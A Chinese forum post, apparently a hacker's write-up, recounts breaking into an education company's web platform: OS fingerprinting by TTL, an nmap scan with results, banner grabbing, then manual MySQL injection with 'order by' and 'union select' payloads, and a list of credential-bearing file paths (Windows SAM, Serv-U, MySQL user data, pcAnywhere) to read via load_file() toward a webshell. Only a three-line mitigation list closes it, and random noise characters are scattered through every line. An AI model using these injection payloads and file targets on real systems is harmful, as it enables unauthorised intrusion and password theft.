题记:; h1 f( @2 G3 ?1 |+ Y; ]
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……( v. A% X6 A8 |* r
第一步:获取需要的信息
; J/ o/ Q* v9 Y/ v& _6 I由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
2 {4 ~+ ?0 A. y- S注:以下为保护特用XXX代替敏感信息
T2 Y+ J! g g7 K顺手先PING了一下他们的域名:
/ v3 G- G4 b0 |* \ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
6 s" Z, v0 b5 G8 r6 d- y64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms* @& r3 j: v: O7 z
顺便了解一下TTL,学好基础知识才能一路顺风:- a# Y. A7 n. [9 o, B6 c
TTL:(Time To Live ) 生存时间
5 w1 [0 P4 N- e1 W1 E. v2 o指定数据包被路由器丢弃之前允许通过的网段数量。
8 [8 J" z% \; ~1 RTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
! }( @3 I# G6 ^3 Z4 X6 v, T使用PING时涉及到的 ICMP 报文类型3 p; C# ^* s% x& K
一个为ICMP请求回显(ICMP Echo Request)
: e$ X. Y3 s J) X一个为ICMP回显应答(ICMP Echo Reply)4 d! I. ~7 X7 A9 g/ y/ G) A
TTL 字段值可以帮助我们识别操作系统类型。$ m# U, \& y4 D1 P4 \% c6 A( j, p& x# T
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
5 s& h* H7 [' U! O: N0 \: qCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
$ a0 X1 x9 y8 w. u/ w( d8 M8 @微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
. K; J8 f( f2 i' ~8 E; {* D& E3 E微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 326 x1 ]4 j$ p9 l" J+ ~' Q1 J h w
当然,返回的TTL值是相同的7 q( }' z2 K$ _# A" s3 Z% J5 L# R
但有些情况下有所特殊- D' ^" q6 U" Z% x+ [4 s
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
6 Z, z; ~, s- `FreeBSD 4.1, 4.0, 3.4;" Q- o( X# X o" I( H9 u3 |) s
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
* i' H& S" z5 Y) \9 jOpenBSD 2.6, 2.7,' K$ p- \, I% H
NetBSD2 o! q8 _# ^$ C O
HP UX 10.20; S. k: R( k2 h9 r9 q
ICMP 回显应答的 TTL 字段值为 255
. l" @2 Z% d4 U' G/ }( D* fWindows 95/98/98SE
* B: L% x5 @, ?' d1 [Windows ME- q. _* I0 M1 A- s4 `, D0 h
ICMP 回显应答的 TTL 字段值为 32( m! @6 b8 ?1 p1 v
Windows NT4 WRKS
3 D7 z4 h2 |# ]# C* n9 a5 r) f1 c2 rWindows NT4 Server
1 u+ S5 `! x$ M* \% ~# k0 c; NWindows 2000
' B9 n+ G) _+ C1 UWindows XP
8 t; X( G+ j# x; H& ^ICMP 回显应答的 TTL 字段值为 128
. G5 U; w4 o" ^4 p6 @这样,我们就可以通过这种方法来辨别操作系统
- {. l8 n; {! K2 k0 K- C$ yTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
* ]4 k5 o* p# W, G6 J. J3 `' O用NMAP扫描一下: h- s0 W7 E6 b7 N9 u
nmap -sT -O XXX.XXX.XXX.XXX5 d4 z/ h2 k9 f' [7 l
如果没有装WinPcap则会弹出提示:& l0 T8 }3 ?: x& ~6 v
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
' v, K- y! p* @) N8 N" K6 Cade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(& M" ]1 V* t+ n W" j/ f) d
) mode — Nmap may not function completely; r5 h6 A$ I- C
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher" U4 }# A+ ]$ s
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win" f( d. [' M1 r
pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
8 ?/ r9 w2 S; ?% zd later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
" u) P3 m* r7 K, n( B9 k4 J) j( Fersions, you may be able to take iphlpapi.dll from another system and place it i- R, @: {9 z( F* f+ B+ V# k
n your system32 dir (e.g. c:\windows\system32)./ G( q: ?$ R `3 F* ?/ o; q
QUITTING!
( g& T$ W( c: Q3 m3 O# L到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
) i& r) M4 r: N3 n安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:, f; }. |; x& G# l+ `, q* X
Interesting ports on XXX.XXX.XXX.XXX:1 }7 K- f \5 ^4 H6 g' N* V
Not shown: 986 closed ports$ w3 C! O+ L8 W$ r! ^
PORT STATE SERVICE
8 Y: R' z0 i. D% Y/ u* o( h21/tcp open ftp3 Q( |; M- N" T: q
22/tcp open ssh
2 j6 g8 `* O9 j" p" t c. [# C23/tcp open telnet
7 N& v2 U3 N, E4 C80/tcp open http
; V7 S: o: N. ~& a5 z: e4 t111/tcp open rpcbind/ F& E- f3 l+ ~! b& y: S
135/tcp filtered msrpc
1 P6 [! h0 ^/ b/ X H139/tcp filtered netbios-ssn
2 M4 S- c L0 f9 N1 v3 e445/tcp filtered microsoft-ds$ _! Q& L# x4 [. O3 {
513/tcp open login
- [6 L( b1 I0 m% G7 y9 [6 h514/tcp open shell. \1 s5 j( O, c6 _9 T4 N" p7 v
593/tcp filtered http-rpc-epmap& V e$ J2 D6 J1 x: q
1720/tcp filtered H.323/Q.931
" e6 V( N; b5 V2 j# B; W3306/tcp open mysql% f8 G: W' S5 r. c8 n6 F
4444/tcp filtered krb524
0 I1 m) e0 r. aDevice type: WAP
/ `" m: E0 W* k9 i' SRunning: Linux 2.4.X
6 x/ W c7 q7 v. ^, N4 @- \3 ~. o& |OS details: DD-WRT (Linux 2.4.35s)! c* z1 u; V, t* U
Network Distance: 13 hops9 r$ C& d: S5 \1 a6 G
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:, Q6 T! K) C8 L
login as:5 `1 J7 r4 O' i6 `8 W! T0 M5 ]
Telnet23端口也是开着的,用telnet 命令链接一下:1 a' v; {' v( @' e) @
telnet XXX.XXX.XXX.XXX" e9 c, n b2 z8 x
提示:2 t, ?9 R6 U3 a6 p
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
v' H, Q' }4 V3 A) h6 @0 Q. MKernel 2.6.18-92.el5PAE on an i686* h! D5 M, f7 j+ r" C. n
login:
3 s% q9 [6 R' Y) R获取HTTP头信息:2 W X% s" C5 c9 V- `. m" F9 _
在本地执行如下PHP代码6 E! H7 C) I0 `. u. B
<?php
) k @' h' \: Z8 f! }: r; H$url = ‘XXX.XXX.XXX.XXX’;
% Z7 v3 G/ o w$ N) G# G `6 e: Yprint_r(get_headers($url));
5 ~! W+ @, |$ ~+ I7 _1 I% Sprint_r(get_headers($url, 1));
9 \ N% C) a. Q; q8 l2 v?>
7 [' [# g3 x8 Y2 g/ E将以上代码保存为PHP文件,执行:$ {9 S3 B9 J1 U1 x' F& }
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
4 Y4 D8 j( u" {# H/ o5 T1 p现在可以得出结论:4 c/ P# {& m# L0 I
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)7 M- @, d: A5 ^* W2 r: q2 Z! e
内核版本:Kernel 2.6.18-92.el5PAE on an i686
2 O3 I! X3 v! ]4 MWEB服务器版本:nginx/0.7.61
$ t) u, y. I6 u3 \! P) h" |, Z第二步,开始测试寻找漏洞& y% ~% H! p0 \# T8 n
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。5 X1 }% h L9 d8 Y3 Q7 e% }
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的: b# v; g u4 I' O
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
6 S0 G" n z8 ^" j4 c6 fhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
/ |) i. _- O% {http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误4 w$ e( ]# r" p x- R, m! {2 d
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
* F( _" b3 @+ ]! w J3 L3、手工注入:
+ _) L+ A" I/ g注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
! ^! }" }9 e! C4 E3.1 猜测当前表字段数
0 e* {, p. f7 j1 T; J dhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
( {$ I, Y M8 [* X5 R) O此处猜测有个简单的算法,都是有技巧的吗,呵呵
) v1 q( `! I3 n l算法简单如下:$ ]1 D: C1 L* W& o
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
9 W5 l* I# c( h& O- C8 m, D2 R第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;0 D8 {( j, o3 G3 _0 _" d
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。& R; Z! R+ t: L
以此来判断,是否过界,配合取中算法猜出字段数。& K5 _ T* {) S9 f7 ]- r
举例:
! ~% N) ^; D6 G7 ^http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常" [ `0 V7 R6 r0 R8 d
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
' B2 T4 \% K" @6 l此时3则为我们要找的字段数。
: n5 l2 X. {7 A7 T3.2 配合union联合查询字段在页面所位置/ a* q! L' X6 l0 B# w u
我们已经知道了字段数为3,此时则可以做如下操作:
: f# f' a5 l, N' Y5 f8 Vhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,36 i# B! n( u, u1 t- H
6 E, l& i$ d3 a0 |4 P B这样就可以测试到哪些字段在页面上有所显示了,如图:
" w& O$ n: [# N3 n( m: W- E, m7 G1 J3 e( ]3 T! q. }
3.3 查敏感信息
% z. A8 \6 [* d: a ]& p这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。1 I/ }0 [8 O/ Q& `& [
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()7 [3 S& G% z& w4 R4 v
3.3.1 先查数据库用户、数据库名,以备后用,如图:. K1 q, T( ~3 T _& `* b, o X' g7 ]
/ m2 J7 q% U3 |/ t
得到数据库用户为root、数据库名为DBxx;) O3 z# t4 Z. N0 q
3.3.2 查配置文件* V S# X |7 X/ V7 j% F
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。8 z. K* d7 l0 x
查看文件有一定的条件限制:
1 r& B( {7 n/ i% G" j欲读取文件必须在服务器上7 I* C. @. ]7 Z- H H' O
必须指定文件完整的路径: }, }" s7 s% Y! U7 A, e5 Y L/ a
必须有权限读取并且文件必须完全可读( Q$ J6 j' S& b& p
欲读取文件必须小于 max_allowed_packet7 o k1 r3 m! g1 ]
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
; ~1 C% G3 }# L3 V3 K6 ^; p6 u常用的一些:
# y5 x; i9 W5 C) k$ D/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
% y0 A$ R B% {1 v% b& U7 t* `/usr/local/apache2/conf/httpd.conf) A4 y5 }8 y1 F" ?
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
f3 h+ O/ S$ x, ^) }2 {; f/usr/local/app/php5/lib/php.ini //PHP相关设置9 i$ D; ?; Y. J
/etc/sysconfig/iptables //从中得到防火墙规则策略1 D( w8 L9 X0 t9 H( z/ W7 F
/etc/httpd/conf/httpd.conf // apache配置文件
$ n5 J" J! g, X1 _6 J: X% T7 @/etc/rsyncd.conf //同步程序配置文件
# K: q s+ G1 c- {! d/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.; n" J1 I+ {1 p3 \+ f2 X) o8 A
/etc/my.cnf //mysql的配置文件
x/ ~5 x( X6 j3 \+ z- C0 b/etc/redhat-release //系统版本8 f m8 |" n. b8 X' e
/etc/issue
7 R- k4 i$ z$ f/etc/issue.net
- i2 e; } @. S+ U$ o5 w F! hc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码9 F: X: _# } ?9 ]; W
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
' l" a" }8 J- Z! ]7 ?+ `9 Wc:\Program Files\Serv-U\ServUDaemon.ini7 R4 `# I$ {7 H5 o* b' N
c:\windows\my.ini //MYSQL配置文件- s! e: U% s0 ]9 j" @$ b5 o1 F! b
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
/ P. P4 D) L* U* _7 b/ X等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,+ v- m' x/ R" e m: B- b0 {
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
3 x: D& m. q. A1 t Q7 ]! Cc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此7 F1 _; B- J# q
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
) z1 i& I0 v) s8 fC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件, h- ?& O! r1 z( C3 r) n
//存储了pcAnywhere的登陆密码
9 W' M8 P" Q# f8 ?% ^( z" G) E由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。! v6 a. E4 [' p" P1 \- \5 l
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。0 N% O& s& a2 |0 m4 v" G3 ? y
最后:防范措施0 Z, o7 x% P3 G# Y
1、修复PHP注入漏洞;
; P4 \% M* t7 b2、Mysql使用普通权限的用户;5 H w% a5 t& P3 ^* Q6 m: A! N7 {
3、升级linux内核至最新版本; |
发表于 2013-2-16 22:23:32
收藏
支持
反对